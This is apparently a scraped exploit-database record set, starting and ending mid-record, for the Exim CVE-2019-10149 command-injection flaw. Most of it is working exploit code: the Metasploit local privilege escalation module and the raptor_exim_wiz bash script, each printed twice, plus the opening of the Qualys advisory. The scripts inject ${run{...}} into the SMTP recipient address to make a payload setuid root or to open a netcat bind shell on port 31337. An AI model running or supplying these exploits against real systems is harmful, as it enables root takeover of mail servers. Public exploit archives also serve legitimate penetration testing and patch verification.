"https://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'expect' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). \nImproper validation of recipient address in deliver_message() \nfunction in /src/deliver.c may lead to command execution with root privileges \n(CVE-2019-10149). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and PoC (@qualys) \n'Dennis Herrmann', # Working exploit (@dhn) \n'Marco Ivaldi', # Working exploit (@0xdea) \n'Guillaume Andr\u00e9' # Metasploit module (@yaumn_) \n], \n'DisclosureDate' => '2019-06-05', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Exim 4.87 - 4.91', \nlower_version: Gem::Version.new('4.87'), \nupper_version: Gem::Version.new('4.91') \n] \n], \n'DefaultOptions' => \n{ \n'PrependSetgid' => true, \n'PrependSetuid' => true \n}, \n'References' => \n[ \n[ 'CVE', '2019-10149' ], \n[ 'EDB', '46996' ], \n[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] \n] \n)) \n \nregister_options( \n[ \nOptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), \nOptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef encode_command(cmd) \n'\\x' + cmd.unpack('H2' * cmd.length).join('\\x') \nend \n \ndef open_tcp_connection \nsocket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) \nparams = Rex::Socket::Parameters.new({ \n'PeerHost' => '127.0.0.1', \n'PeerPort' => datastore['EXIMPORT'] \n}) \nbegin \nsocket = socket_subsystem.create_tcp_client_channel(params) \nrescue => e \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nraise e \nend \nreturn socket_subsystem, socket \nend \n \ndef inject_payload(payload) \nif session.type == 'meterpreter' \nsocket_subsystem, socket = open_tcp_connection \n \ntcp_conversation = { \nnil => /220/, \n'helo localhost' => /250/, \n\"MAIL FROM:<>\" => /250/, \n\"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/, \n'DATA' => /354/, \n'Received:' => nil, \n'.' => /250/ \n} \n \nbegin \ntcp_conversation.each do |line, pattern| \nTimeout.timeout(datastore['SendExpectTimeout']) do \nif line \nif line == 'Received:' \nfor i in (1..31) \nsocket.puts(\"#{line} #{i}\\n\") \nend \nelse \nsocket.puts(\"#{line}\\n\") \nend \nend \nif pattern \nsocket.expect(pattern) \nend \nend \nend \nrescue Rex::ConnectionError => e \nfail_with(Failure::Unreachable, e.message) \nrescue Timeout::Error \nfail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') \nensure \nsocket.puts(\"QUIT\\n\") \nsocket.close \nsocket_subsystem.shutdown \nend \nelse \nunless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\ \n\"&& echo true\").chomp.to_s == 'true' \nfail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\") \nend \n \nbash_script = %| \n#!/bin/bash \n \nexec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho 'rcpt to:<${run{#{payload}}}@localhost>' >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in $(seq 1 30); do \necho 'Received: $i' >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n| \n \n@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@bash_script_path, bash_script) \nregister_file_for_cleanup(@bash_script_path) \nchmod(@bash_script_path) \ncmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\") \nend \n \nprint_status('Payload sent, wait a few seconds...') \nRex.sleep(5) \nend \n \ndef check_for_bash \nunless command_exists?('/bin/bash') \nfail_with(Failure::NotFound, 'bash not found') \nend \nend \n \ndef on_new_session(session) \nsuper \n \nif session.type == 'meterpreter' \nsession.core.use('stdapi') unless session.ext.aliases.include?('stdapi') \nsession.fs.file.rm(@payload_path) \nelse \nsession.shell_command_token(\"rm -f #{@payload_path}\") \nend \nend \n \ndef check \nif session.type == 'meterpreter' \nbegin \nsocket_subsystem, socket = open_tcp_connection \nrescue \nreturn CheckCode::Safe \nend \nres = socket.gets \nsocket.close \nsocket_subsystem.shutdown \nelse \ncheck_for_bash \nres = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\ \n\"(read -u 3 && echo $REPLY) || echo false'\") \nif res == 'false' \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nreturn CheckCode::Safe \nend \nend \n \nif res =~ /Exim ([0-9\\.]+)/i \nversion = Gem::Version.new($1) \nvprint_status(\"Found exim version: #{version}\") \nif version >= target[:lower_version] && version <= target[:upper_version] \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nCheckCode::Unknown \nend \n \ndef exploit \nif is_root? \nunless datastore['ForceExploit'] \nfail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.') \nend \nend \n \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \nif nosuid?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\") \nend \n \nunless datastore['PrependSetuid'] && datastore['PrependSetgid'] \nfail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\ \n'to get root privileges.') \nend \n \nif session.type == 'shell' \ncheck_for_bash \nend \n \n@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@payload_path, payload.encoded_exe) \nregister_file_for_cleanup(@payload_path) \ninject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\ \n\"chmod 4755 #{@payload_path}'\")) \n \nunless setuid?(@payload_path) \nfail_with(Failure::Unknown, \"Couldn't escalate privileges\") \nend \n \ncmd_exec(\"#{@payload_path} & echo \") \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154198/exim4_deliver_message_priv_esc.rb.txt"}, {"lastseen": "2019-06-18T11:49:32", "description": "", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "PACKETSTORM:153312", "href": "https://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/bash \n \n# \n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit \n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution. \n# (CVE-2019-10149) \n# \n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team. \n# \n# Credits: \n# Qualys Security Advisory team (kudos for your amazing research!) \n# Dennis 'dhn' Herrmann (/dev/tcp technique) \n# \n# Usage (setuid method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m setuid \n# Preparing setuid shell helper... \n# Delivering setuid payload... \n# [...] \n# Waiting 5 seconds... \n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Usage (netcat method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m netcat \n# Delivering netcat payload... \n# Waiting 5 seconds... \n# localhost [127.0.0.1] 31337 (?) open \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Vulnerable platforms: \n# Exim 4.87 - 4.91 \n# \n# Tested against: \n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] \n# \n \nMETHOD=\"setuid\" # default method \nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost' \nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' \n \n# usage instructions \nfunction usage() \n{ \necho \"$0 [-m METHOD]\" \necho \necho \"-m setuid : use the setuid payload (default)\" \necho \"-m netcat : use the netcat payload\" \necho \nexit 1 \n} \n \n# payload delivery \nfunction exploit() \n{ \n# connect to localhost:25 \nexec 3<>/dev/tcp/localhost/25 \n \n# deliver the payload \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho \"rcpt to:<$PAYLOAD>\" >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in {1..31} \ndo \necho \"Received: $i\" >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n} \n \n# print banner \necho \necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit' \necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' \necho \n \n# parse command line \nwhile [ ! -z \"$1\" ]; do \ncase $1 in \n-m) shift; METHOD=\"$1\"; shift;; \n* ) usage \n;; \nesac \ndone \nif [ -z $METHOD ]; then \nusage \nfi \n \n# setuid method \nif [ $METHOD = \"setuid\" ]; then \n \n# prepare a setuid shell helper to circumvent bash checks \necho \"Preparing setuid shell helper...\" \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c \ngcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null \nif [ $? -ne 0 ]; then \necho \"Problems compiling setuid shell helper, check your gcc.\" \necho \"Falling back to the /bin/sh method.\" \ncp /bin/sh /tmp/pwned \nfi \necho \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_SETUID \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nls -l /tmp/pwned \n/tmp/pwned \n \n# netcat method \nelif [ $METHOD = \"netcat\" ]; then \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_NETCAT \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nnc -v 127.0.0.1 31337 \n \n# print help \nelse \nusage \nfi \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/153312/raptor_exim_wiz.sh.txt"}], "zdt": [{"lastseen": "2019-06-18T13:57:26", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "zdt", "title": "Exim 4.91 Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "1337DAY-ID-32869", "href": "https://0day.today/exploit/description/32869", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n echo \"$0 [-m METHOD]\"\r\n echo\r\n echo \"-m setuid : use the setuid payload (default)\"\r\n echo \"-m netcat : use the netcat payload\"\r\n echo\r\n exit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n # connect to localhost:25\r\n exec 3<>/dev/tcp/localhost/25\r\n\r\n # deliver the payload\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"rcpt to:<$PAYLOAD>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in {1..31}\r\n do\r\n echo \"Received: $i\" >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! -z \"$1\" ]; do\r\n case $1 in\r\n -m) shift; METHOD=\"$1\"; shift;;\r\n * ) usage\r\n ;;\r\n esac\r\ndone\r\nif [ -z $METHOD ]; then\r\n usage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n # prepare a setuid shell helper to circumvent bash checks\r\n echo \"Preparing setuid shell helper...\"\r\n echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n if [ $? -ne 0 ]; then\r\n echo \"Problems compiling setuid shell helper, check your gcc.\"\r\n echo \"Falling back to the /bin/sh method.\"\r\n cp /bin/sh /tmp/pwned\r\n fi\r\n echo\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_SETUID\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n ls -l /tmp/pwned\r\n /tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_NETCAT\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n nc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n usage\r\nfi\n\n# 0day.today [2019-06-18] #", "sourceHref": "https://0day.today/exploit/32869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-26T22:37:22", "description": "This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T00:00:00", "type": "zdt", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "1337DAY-ID-33150", "href": "https://0day.today/exploit/description/33150", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' ],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' => /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend\n\n# 0day.today [2021-09-27] #", "sourceHref": "https://0day.today/exploit/33150", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-13T00:22:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-07T00:00:00", "type": "zdt", "title": "Exim 4.87 < 4.91 - (Local / Remote) Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0095", "CVE-1999-0145", "CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "1337DAY-ID-32848", "href": "https://0day.today/exploit/description/32848", "sourceData": "Qualys Security Advisory\n\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nLocal exploitation\nRemote exploitation\n- Non-default configurations\n- Default configuration\nAcknowledgments\nTimeline\n\n Boromir: \"What is this new devilry?\"\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\n -- The Lord of the Rings: The Fellowship of the Ring\n\n\n========================================================================\nSummary\n========================================================================\n\nDuring a code review of the latest changes in the Exim mail server\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\nRemote *Command* Execution, not Remote Code Execution: an attacker can\nexecute arbitrary commands with execv(), as root; no memory corruption\nor ROP (Return-Oriented Programming) is involved.\n\nThis vulnerability is exploitable instantly by a local attacker (and by\na remote attacker in certain non-default configurations). To remotely\nexploit this vulnerability in the default configuration, an 